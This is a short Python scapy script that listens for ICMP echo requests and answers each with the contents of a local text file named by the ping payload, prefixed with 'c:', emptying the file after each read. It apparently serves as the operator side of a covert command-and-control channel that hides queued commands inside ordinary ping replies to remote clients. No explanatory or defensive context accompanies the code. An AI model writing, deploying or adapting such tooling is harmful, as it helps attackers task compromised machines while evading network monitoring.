from scapy.all import *
import re

def handle_load(load):
    try:
        f = open(f"C://Users/Clicker/Desktop/ICMP/{load}.txt","r", encoding='UTF-16')
        command = "c:" + f.read().strip()
        f.close()
        print(command);
        open(f"C://Users/Clicker/Desktop/ICMP/{load}.txt","w").close()
        return command;
    except:
        return ""

def handle_ping(pkt):
    if (pkt[2].type == 8):
        try:
            dst=pkt[1].dst
            src=pkt[1].src
            seq=pkt[2].seq
            id=pkt[2].id
            load = pkt[3].load.decode('UTF-8')
            print(load)
            response = handle_load(load)
            reply = IP(src=dst, dst=src)/ICMP(type=0, id=id, seq=seq)/response
            send(reply,verbose=False)
        except:
            pass

if __name__=="__main__":
    iface = "Ethernet"
    filter = "icmp and icmp[0]=8"
    sniff(iface=iface, prn=handle_ping, filter=filter)
